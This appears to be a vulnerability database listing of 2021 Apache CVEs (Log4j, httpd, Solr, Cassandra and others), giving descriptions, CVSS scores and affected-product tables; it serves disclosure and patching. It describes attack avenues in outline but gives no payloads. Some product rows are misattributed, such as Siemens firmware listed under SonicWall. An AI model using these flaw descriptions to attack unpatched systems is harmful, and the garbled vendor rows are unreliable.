Apache Guacamole 1.2.0 and 1.3.0 do not properly validate responses received from a SAML identity provider. If SAML support is enabled, this may allow a malicious user to assume the identity of another Guacamole user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,CWE-287,

Products Affected

Vendor Product Version
apache guacamole 1.2.0
apache guacamole 1.3.0
CVE-2021-44040 MEDIUM

Improper Input Validation vulnerability in request line parsing of Apache Traffic Server allows an attacker to send invalid requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.3 and 9.0.0 to 9.1.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-44140 MEDIUM

Remote attackers may delete arbitrary files in a system hosting a JSPWiki instance, versions up to 2.11.0.M8, by using a carefuly crafted http request on logout, given that those files are reachable to the user running the JSPWiki instance. Apache JSPWiki users should upgrade to 2.11.0 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2021-44145 MEDIUM

In the TransformXML processor of Apache NiFi before 1.15.1 an authenticated user could configure an XSLT file which, if it included malicious external entity calls, may reveal sensitive information.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache nifi *
CVE-2021-44224 MEDIUM

A crafted URI sent to httpd configured as a forward proxy (ProxyRequests on) can cause a crash (NULL pointer dereference) or, for configurations mixing forward and reverse proxy declarations, can allow for requests to be directed to a declared Unix Domain Socket endpoint (Server Side Request Forgery). This issue affects Apache HTTP Server 2.4.7 up to 2.4.51 (included).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H 3.9 4.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-476,

Products Affected

Vendor Product Version
apache http_server *
oracle communications_session_route_manager *
oracle communications_operations_monitor 4.4
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
apple macos *
oracle instantis_enterprisetrack 17.1
oracle communications_operations_monitor 4.3
oracle http_server -
oracle communications_operations_monitor 5.0
debian debian_linux 10.0
debian debian_linux 11.0
oracle communications_operations_monitor 4.0
fedoraproject fedora 35
oracle communications_session_report_manager *
fedoraproject fedora 34
tenable tenable.sc *
fedoraproject fedora 36
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
apple mac_os_x 10.15.7
oracle communications_element_manager *
CVE-2021-44228 HIGH

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 3.9 6.0

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-400,CWE-502,CWE-917,

Products Affected

Vendor Product Version
siemens comos *
siemens energy_engage 3.1
cisco paging_server 12.5(2)
cisco data_center_network_manager *
cisco virtual_topology_system 2.6.6
cisco smart_phy 3.1.5
intel sensor_solution_firmware_development_kit -
siemens gma-manager *
cisco fxos 7.0.0
cisco unified_contact_center_enterprise 12.0(1)
cisco nexus_dashboard *
siemens spectrum_power_7 *
cisco mobility_services_engine -
cisco video_surveillance_manager 7.14(2.26)
cisco unified_communications_manager 11.5(1)
cisco paging_server 9.0(2)
cisco identity_services_engine *
netapp snapcenter -
cisco sd-wan_vmanage 20.4
siemens nx *
siemens siveillance_command *
siemens siveillance_control_pro *
cisco dna_center *
cisco connected_analytics_for_network_deployment 7.3
intel datacenter_manager *
cisco crosswork_platform_infrastructure 4.1.0
cisco common_services_platform_collector 002.010(000.000)
cisco network_dashboard_fabric_controller 11.2(1)
cisco ucs_central_software 2.0
cisco wan_automation_engine 7.1.3
cisco packaged_contact_center_enterprise *
cisco firepower_threat_defense 7.1.0
cisco paging_server 8.5(1)
siemens solid_edge_harness_design 2020
cisco smart_phy 21.3
apple xcode *
cisco customer_experience_cloud_agent *
cisco emergency_responder 11.5
cisco smart_phy 3.2.1
cisco cloudcenter_cost_optimizer *
cisco identity_services_engine 002.006(000.156)
cisco unified_contact_center_express *
intel computer_vision_annotation_tool -
cisco advanced_malware_protection_virtual_private_cloud_appliance *
cisco unified_communications_manager 11.5(1)su3
apache log4j *
intel audio_development_kit -
siemens spectrum_power_4 *
cisco integrated_management_controller_supervisor 002.003(002.000)
cisco unified_intelligence_center *
siemens captial 2019.1
cisco wan_automation_engine 7.2.1
cisco optical_network_controller 1.1
netapp oncommand_insight -
cisco unified_communications_manager_im_&_presence_service 11.5(1)
cisco common_services_platform_collector 002.009(001.001)
siemens siguard_dsa *
intel data_center_manager *
cisco emergency_responder *
cisco cloudcenter_suite 5.4(1)
cisco connected_analytics_for_network_deployment 006.005.000.000
cisco crosswork_zero_touch_provisioning 3.0.0
cisco connected_mobile_experiences -
cisco crosswork_network_controller 3.0.0
siemens vesys 2021.1
cisco cloudcenter_suite 5.5.1
cisco unified_contact_center_express 12.6(2)
cisco nexus_insights *
cisco cloudcenter_suite 5.5(1)
cisco paging_server 14.0(1)
cisco crosswork_optimization_engine *
cisco evolved_programmable_network_manager 3.1
netapp ontap_tools -
cisco cloudcenter_suite 5.3(0)
cisco wan_automation_engine 7.4
siemens xpedition_package_integrator -
cisco paging_server 9.0(1)
cisco firepower_threat_defense 7.0.0
siemens capital *
siemens spectrum_power_7 2.30
siemens siveillance_vantage *
cisco packaged_contact_center_enterprise 11.6(1)
cisco crosswork_network_automation 3.0.0
cisco cyber_vision_sensor_management_extension 4.0.2
cisco unified_computing_system 006.008(001.000)
cisco wan_automation_engine 7.2.3
cisco cloudcenter_suite 4.10.0.15
sonicwall email_security *
cisco wan_automation_engine *
siemens sppa-t3000_ses3000_firmware *
cisco finesse 12.5(1)
cisco unified_contact_center_management_portal 12.6(1)
bentley synchro_4d *
cisco network_dashboard_fabric_controller 11.5(1)
siemens e-car_operation_center *
siemens opcenter_intelligence *
cisco dna_center 2.2.2.8
cisco unified_communications_manager_im_and_presence_service 11.5(1)
cisco ucs_director *
cisco cloud_connect *
cisco identity_services_engine 2.4.0
cisco network_dashboard_fabric_controller 11.0(1)
cisco connected_analytics_for_network_deployment 007.003.001.001
siemens 6bk1602-0aa52-0tp0_firmware *
cisco connected_analytics_for_network_deployment 007.003.000
cisco identity_services_engine 003.002(000.116)
cisco webex_meetings_server *
cisco common_services_platform_collector 002.009(001.000)
cisco cloudcenter_suite 5.5(0)
siemens sipass_integrated 2.85
cisco ucs_central_software 2.0(1c)
cisco network_assurance_engine 6.0(2.1912)
cisco network_assurance_engine *
siemens desigo_cc_advanced_reports 3.0
siemens teamcenter *
cisco crosswork_data_gateway *
cisco unified_sip_proxy 010.000(001)
cisco sd-wan_vmanage *
cisco firepower_threat_defense 6.5.0
netapp cloud_insights -
netapp solidfire_&_hci_storage_node -
cisco enterprise_chat_and_email *
cisco network_dashboard_fabric_controller 11.5(2)
siemens energyip_prepay 3.7
cisco intersight_virtual_appliance *
cisco unified_communications_manager 11.5(1.21900.40)
siemens sentron_powermanager 4.2
intel genomics_kernel_library -
debian debian_linux 10.0
siemens energyip 8.5
cisco crosswork_platform_infrastructure *
cisco video_surveillance_manager 7.14(4.018)
cisco network_services_orchestrator *
cisco unified_contact_center_enterprise 11.6(2)
cisco unity_connection 11.5(1.10000.6)
cisco unified_contact_center_express 12.6(1)
cisco cloudcenter_suite_admin *
cisco emergency_responder 11.5(4.65000.14)
cisco enterprise_chat_and_email 12.0(1)
cisco unified_customer_voice_portal 11.6(1)
cisco evolved_programmable_network_manager 3.0
snowsoftware snow_commander *
cisco fxos 7.1.0
cisco broadworks *
cisco unified_communications_manager 11.5(1.18119.2)
siemens desigo_cc_advanced_reports 4.2
cisco unified_contact_center_express 12.5(1)
cisco cloudcenter_suite 5.5.0
cisco contact_center_domain_manager *
cisco unified_communications_manager 11.5(1.18900.97)
cisco unified_contact_center_enterprise 12.5(1)
cisco cyber_vision 4.0.2
cisco connected_analytics_for_network_deployment 006.004.000.003
cisco connected_analytics_for_network_deployment 007.000.001
siemens siguard_dsa 4.4
siemens vesys *
cisco enterprise_chat_and_email 12.6(1)
cisco firepower_threat_defense 6.4.0
cisco cloudcenter_suite 5.3.0
cisco crosswork_network_automation -
siemens siveillance_identity 1.6
siemens energyip 8.6
cisco identity_services_engine 002.004(000.914)
cisco video_surveillance_operations_manager *
cisco network_services_orchestrator -
cisco ucs_central_software 2.0(1e)
cisco unified_customer_voice_portal 11.6
cisco connected_analytics_for_network_deployment 007.001.000
cisco network_dashboard_fabric_controller 11.5(3)
siemens navigator *
cisco paging_server 8.3(1)
cisco unified_contact_center_enterprise 12.6(1)
cisco unified_workforce_optimization *
cisco webex_meetings_server 3.0
siemens desigo_cc_advanced_reports 4.1
intel system_studio -
cisco network_insights_for_data_center 6.0(2.1914)
cisco firepower_threat_defense 6.6.0
cisco prime_service_catalog *
cisco crosswork_network_automation 4.1.0
cisco ucs_central_software 2.0(1k)
cisco unified_customer_voice_portal 12.5
siemens siguard_dsa 4.3
siemens xpedition_enterprise -
cisco connected_analytics_for_network_deployment 008.000.000.000.004
cisco wan_automation_engine 7.3
siemens energyip_prepay *
cisco fxos 6.4.0
cisco dna_spaces_connector -
siemens siguard_dsa 4.2
cisco unity_connection *
cisco sd-wan_vmanage 20.8
netapp brocade_san_navigator -
cisco emergency_responder 11.5(4.66000.14)
siemens head-end_system_universal_device_integration_system *
cisco intersight_virtual_appliance 1.0.9-343
siemens captial *
cisco unified_customer_voice_portal *
cisco fxos 6.3.0
cisco connected_analytics_for_network_deployment 007.002.000
cisco workload_optimization_manager *
cisco smart_phy 3.1.3
cisco cloudcenter *
cisco paging_server *
cisco dna_spaces -
cisco cyber_vision_sensor_management_extension *
cisco evolved_programmable_network_manager 4.0
cisco connected_analytics_for_network_deployment 008.000.000
cisco sd-wan_vmanage 20.6.1
cisco unified_customer_voice_portal 12.0
cisco integrated_management_controller_supervisor 2.3.2.0
cisco virtualized_infrastructure_manager *
cisco data_center_network_manager 11.3(1)
siemens 6bk1602-0aa42-0tp0_firmware *
cisco crosswork_zero_touch_provisioning *
cisco ucs_central_software 2.0(1d)
cisco unified_communications_manager 11.5(1.22900.28)
cisco ucs_central_software 2.0(1a)
cisco firepower_threat_defense 6.2.3
cisco common_services_platform_collector 002.009(000.002)
cisco common_services_platform_collector 002.009(001.002)
cisco connected_analytics_for_network_deployment 007.003.003
cisco sd-wan_vmanage 20.7
siemens desigo_cc_info_center 5.0
cisco ucs_central_software 2.0(1l)
cisco evolved_programmable_network_manager 5.1
cisco crosswork_network_automation 2.0.0
cisco enterprise_chat_and_email 12.5(1)
cisco virtualized_voice_browser *
intel oneapi_sample_browser -
cisco unified_contact_center_enterprise *
cisco evolved_programmable_network_manager 4.1
cisco ucs_central *
cisco unified_customer_voice_portal 12.5(1)
cisco video_surveillance_manager 7.14(3.025)
debian debian_linux 11.0
cisco identity_services_engine 003.001(000.518)
cisco prime_service_catalog 12.1
cisco unified_customer_voice_portal 12.6(1)
cisco unified_intelligence_center 12.6(2)
siemens 6bk1602-0aa12-0tp0_firmware *
siemens energyip_prepay 3.8
cisco cloudcenter_suite 4.10(0.15)
siemens desigo_cc_advanced_reports 5.0
cisco contact_center_management_portal *
siemens logo!_soft_comfort *
cisco firepower_threat_defense 6.7.0
cisco unified_communications_manager_im_&_presence_service 11.5(1.22900.6)
siemens siveillance_viewpoint *
cisco fog_director -
cisco unified_sip_proxy 010.000(000)
bentley synchro *
cisco network_dashboard_fabric_controller 11.1(1)
siemens energyip 9.0
cisco fxos 6.2.3
cisco sd-wan_vmanage 20.6
cisco wan_automation_engine 7.2.2
siemens industrial_edge_management *
intel system_debugger -
cisco automated_subsea_tuning *
cisco unified_sip_proxy 010.002(000)
cisco unified_sip_proxy *
cisco cx_cloud_agent 001.012
apache log4j 2.0
cisco unified_workforce_optimization 11.5(1)
cisco common_services_platform_collector 002.009(000.001)
cisco business_process_automation *
cisco video_surveillance_manager 7.14(1.26)
cisco fxos 6.7.0
cisco finesse *
siemens mendix *
siemens sipass_integrated 2.80
cisco unity_connection 11.5
netapp cloud_secure_agent -
siemens industrial_edge_management_hub *
siemens desigo_cc_advanced_reports 4.0
debian debian_linux 9.0
siemens solid_edge_harness_design *
cisco smart_phy *
cisco virtual_topology_system *
intel secure_device_onboard -
cisco identity_services_engine 002.007(000.356)
cisco network_dashboard_fabric_controller 11.4(1)
cisco ucs_central_software 2.0(1h)
siemens 6bk1602-0aa32-0tp0_firmware *
cisco sd-wan_vmanage 20.3
cisco cloudcenter_workload_manager *
cisco dna_spaces:_connector *
siemens energyip 8.7
siemens vesys 2019.1
siemens capital 2019.1
cisco firepower_threat_defense 6.3.0
cisco unified_communications_manager *
cisco ucs_central_software 2.0(1b)
siemens spectrum_power_4 4.70
snowsoftware vm_access_proxy *
cisco wan_automation_engine 7.5
cisco connected_analytics_for_network_deployment 006.005.000.
siemens siveillance_identity 1.5
cisco cloudcenter_suite 5.4.1
cisco iot_operations_dashboard -
siemens 6bk1602-0aa22-0tp0_firmware *
cisco unified_communications_manager 11.5(1.17900.52)
cisco unified_contact_center_enterprise 12.6(2)
cisco unified_communications_manager_im_and_presence_service *
fedoraproject fedora 35
siemens desigo_cc_info_center 5.1
siemens desigo_cc_advanced_reports 5.1
fedoraproject fedora 34
siemens sentron_powermanager 4.1
cisco network_dashboard_fabric_controller 11.3(1)
netapp solidfire_enterprise_sds -
cisco common_services_platform_collector 002.009(000.000)
siemens mindsphere *
percussion rhythmyx *
cisco integrated_management_controller_supervisor *
siemens solid_edge_cam_pro *
cisco ucs_central_software 2.0(1g)
cisco evolved_programmable_network_manager *
cisco automated_subsea_tuning 02.01.00
cisco identity_services_engine 003.000(000.458)
cisco wan_automation_engine 7.6
cisco finesse 12.6(1)
siemens vesys 2020.1
cisco smart_phy 3.1.4
cisco common_services_platform_collector *
cisco crosswork_network_automation 4.1.1
cisco unified_intelligence_center 12.6(1)
cisco unified_customer_voice_portal 12.0(1)
netapp active_iq_unified_manager -
cisco broadworks -
cisco ucs_central_software 2.0(1f)
siemens operation_scheduler *
cisco webex_meetings_server 4.0
cisco fxos 6.6.0
cisco optical_network_controller *
netapp cloud_manager -
cisco paging_server 9.1(1)
cisco paging_server 8.4(1)
cisco smart_phy 3.1.2
cisco crosswork_optimization_engine 3.0.0
cisco crosswork_network_controller *
cisco fxos 6.5.0
cisco sd-wan_vmanage 20.5
cisco unified_sip_proxy 010.002(001)
cisco crosswork_data_gateway 3.0.0
cisco evolved_programmable_network_manager 5.0
CVE-2021-44451 MEDIUM

Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. Users should upgrade to Apache Superset 1.4.0 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,CWE-522,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-44521 HIGH

When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 2.3 6.0

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,CWE-732,

Products Affected

Vendor Product Version
apache cassandra *
CVE-2021-44548 MEDIUM

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB attacks, which may result in: * The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes), * In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worse-case scenario, Remote Code Execution This issue affects all Apache Solr versions prior to 8.11.1. This issue only affects Windows.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-40,CWE-22,

Products Affected

Vendor Product Version
apache solr *
CVE-2021-44549 MEDIUM

Apache Sling Commons Messaging Mail provides a simple layer on top of JavaMail/Jakarta Mail for OSGi to send mails via SMTPS. To reduce the risk of "man in the middle" attacks additional server identity checks must be performed when accessing mail servers. For compatibility reasons these additional checks are disabled by default in JavaMail/Jakarta Mail. The SimpleMailService in Apache Sling Commons Messaging Mail 1.0 lacks an option to enable these checks for the shared mail session. A user could enable these checks nevertheless by accessing the session via the message created by SimpleMessageBuilder and setting the property mail.smtps.ssl.checkserveridentity to true. Apache Sling Commons Messaging Mail 2.0 adds support for enabling server identity checks and these checks are enabled by default. - https://javaee.github.io/javamail/docs/SSLNOTES.txt - https://javaee.github.io/javamail/docs/api/com/sun/mail/smtp/package-summary.html - https://github.com/eclipse-ee4j/mail/issues/429

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,CWE-295,

Products Affected

Vendor Product Version
apache sling_commons_messaging_mail 1.0.0
CVE-2021-44759 MEDIUM

Improper Authentication vulnerability in TLS origin validation of Apache Traffic Server allows an attacker to create a man in the middle attack. This issue affects Apache Traffic Server 8.0.0 to 8.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,CWE-287,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-44790 HIGH

A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,CWE-787,

Products Affected

Vendor Product Version
apache http_server *
oracle communications_session_route_manager *
oracle communications_operations_monitor 4.4
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
apple macos *
oracle instantis_enterprisetrack 17.1
oracle communications_operations_monitor 4.3
oracle communications_operations_monitor 5.0
debian debian_linux 10.0
debian debian_linux 11.0
fedoraproject fedora 35
oracle communications_session_report_manager *
netapp cloud_backup -
fedoraproject fedora 34
tenable tenable.sc *
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
apple mac_os_x 10.15.7
oracle communications_element_manager *
CVE-2021-44791 MEDIUM

In Apache Druid 0.22.1 and earlier, certain specially-crafted links result in unescaped URL parameters being sent back in HTML responses. This makes it possible to execute reflected XSS attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-44832 HIGH

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H 0.7 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-74,CWE-20,

Products Affected

Vendor Product Version
oracle communications_brm_-_elastic_charging_engine *
oracle communications_brm_-_elastic_charging_engine 12.0.0.5.0
oracle policy_automation_for_mobile_devices *
oracle retail_xstore_point_of_service 21.0.1
apache log4j *
oracle communications_diameter_signaling_router *
fedoraproject fedora 35
oracle primavera_gateway *
oracle primavera_p6_enterprise_project_portfolio_management *
oracle retail_xstore_point_of_service 20.0.1
oracle health_sciences_data_management_workbench 2.5.2.1
fedoraproject fedora 34
oracle communications_interactive_session_recorder 6.3
apache log4j 2.0
oracle policy_automation *
oracle retail_xstore_point_of_service 18.0.3
oracle primavera_gateway 21.12.0
oracle weblogic_server 12.2.1.4.0
oracle product_lifecycle_analytics 3.6.1
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle primavera_unifier 20.12
oracle siebel_ui_framework *
oracle primavera_unifier 21.12
debian debian_linux 9.0
oracle retail_assortment_planning 16.0.3
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle communications_offline_mediation_controller 12.0.0.5.0
oracle health_sciences_data_management_workbench 3.1.0.3
oracle retail_xstore_point_of_service 19.0.2
oracle retail_order_broker 19.1
oracle siebel_ui_framework 21.12
oracle primavera_unifier 19.12
oracle health_sciences_data_management_workbench 3.0.0.0
oracle retail_fiscal_management 14.2
oracle primavera_p6_enterprise_project_portfolio_management 21.12.0.0
oracle communications_interactive_session_recorder 6.4
oracle weblogic_server 14.1.1.0.0
cisco cloudcenter 4.10.0.16
oracle retail_order_broker 18.0
oracle flexcube_private_banking 12.1.0
CVE-2021-45029 HIGH

Groovy Code Injection & SpEL Injection which lead to Remote Code Execution. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,CWE-94,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
CVE-2021-45046 MEDIUM

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.0 CRITICAL CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H 2.2 6.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-917,CWE-917,

Products Affected

Vendor Product Version
siemens comos *
siemens siveillance_vantage *
siemens energy_engage 3.1
siemens energyip 9.0
sonicwall email_security *
siemens sppa-t3000_ses3000_firmware *
siemens siveillance_identity 1.6
siemens energyip 8.6
siemens e-car_operation_center *
siemens industrial_edge_management *
intel sensor_solution_firmware_development_kit -
intel system_debugger -
siemens gma-manager *
siemens opcenter_intelligence *
apache log4j 2.0
siemens navigator *
intel datacenter_manager -
siemens spectrum_power_7 *
siemens desigo_cc_advanced_reports 4.1
siemens mendix *
siemens sipass_integrated 2.80
intel system_studio -
siemens industrial_edge_management_hub *
siemens tracealertserverplus *
siemens desigo_cc_advanced_reports 4.0
siemens 6bk1602-0aa52-0tp0_firmware *
siemens siguard_dsa 4.3
siemens solid_edge_harness_design *
siemens xpedition_enterprise -
intel secure_device_onboard -
siemens nx *
siemens siveillance_command *
siemens sipass_integrated 2.85
siemens siveillance_control_pro *
siemens teamcenter *
siemens siguard_dsa 4.2
siemens 6bk1602-0aa32-0tp0_firmware *
siemens energyip 8.7
siemens vesys 2019.1
siemens head-end_system_universal_device_integration_system *
siemens captial *
siemens spectrum_power_4 4.70
siemens energyip_prepay 3.7
siemens solid_edge_harness_design 2020
siemens siveillance_identity 1.5
siemens sentron_powermanager 4.2
intel computer_vision_annotation_tool -
intel genomics_kernel_library -
debian debian_linux 10.0
apache log4j *
siemens 6bk1602-0aa22-0tp0_firmware *
intel audio_development_kit -
siemens energyip 8.5
siemens spectrum_power_4 *
fedoraproject fedora 35
siemens desigo_cc_info_center 5.1
siemens captial 2019.1
siemens desigo_cc_advanced_reports 5.1
fedoraproject fedora 34
siemens 6bk1602-0aa42-0tp0_firmware *
siemens sentron_powermanager 4.1
siemens mindsphere *
siemens desigo_cc_info_center 5.0
siemens solid_edge_cam_pro *
intel oneapi -
debian debian_linux 11.0
siemens desigo_cc_advanced_reports 4.2
siemens operation_scheduler *
siemens 6bk1602-0aa12-0tp0_firmware *
siemens energyip_prepay 3.8
siemens desigo_cc_advanced_reports 5.0
siemens xpedition_package_integrator -
siemens logo!_soft_comfort *
siemens siguard_dsa 4.4
siemens vesys *
siemens siveillance_viewpoint *
siemens spectrum_power_7 2.30
CVE-2021-45105 MEDIUM

Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-674,CWE-20,CWE-674,

Products Affected

Vendor Product Version
oracle health_sciences_inform 6.2.1.1
oracle enterprise_manager_base_platform 13.4.0.0
oracle retail_price_management 15.0.3.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_customer_insights 16.0.2
sonicwall 6bk1602-0aa42-0tp0_firmware *
oracle retail_invoice_matching 15.0.3
sonicwall web_application_firewall *
oracle communications_network_charging_and_control *
oracle retail_store_inventory_management 14.1.3.5
oracle retail_integration_bus 15.0.3.1
oracle retail_service_backbone 14.1.3
oracle insurance_data_gateway 1.0.1
oracle hospitality_suite8 8.13.0
oracle retail_merchandising_system 19.0.1
oracle retail_returns_management 14.1
oracle communications_unified_inventory_management 7.3.5
oracle insurance_insbridge_rating_and_underwriting 5.2.0
oracle retail_order_management_system 19.5
oracle primavera_p6_enterprise_project_portfolio_management 21.12.0.0
oracle healthcare_foundation *
oracle weblogic_server 14.1.1.0.0
oracle banking_platform 2.6.2
oracle retail_service_backbone 15.0.3.1
oracle communications_session_route_manager *
oracle retail_price_management 16.0.3.0
oracle instantis_enterprisetrack 17.1
oracle hyperion_infrastructure_technology *
apache log4j *
oracle enterprise_manager_base_platform 13.5.0.0
oracle retail_predictive_application_server 16.0.3.240
oracle communications_session_report_manager *
oracle communications_webrtc_session_controller 7.2.0.0
oracle health_sciences_empirica_signal 9.2.0.0
oracle communications_pricing_design_center 12.0.0.4
oracle banking_platform 2.12.0
oracle communications_performance_intelligence_center 10.4.0.3
oracle retail_store_inventory_management 15.0.3.8
sonicwall 6bk1602-0aa32-0tp0_firmware *
oracle communications_element_manager *
oracle identity_management_suite 12.2.1.4.0
oracle primavera_unifier 20.12
oracle communications_webrtc_session_controller 7.2.1
oracle communications_cloud_native_core_unified_data_repository 1.15.0
oracle utilities_framework 4.4.0.3.0
oracle retail_service_backbone *
oracle retail_financial_integration *
oracle retail_integration_bus 19.0.1
oracle communications_pricing_design_center 12.0.0.5
oracle healthcare_data_repository 8.1.1
oracle retail_service_backbone 19.0.1.0
oracle communications_convergent_charging_controller *
oracle peoplesoft_enterprise_peopletools 8.59
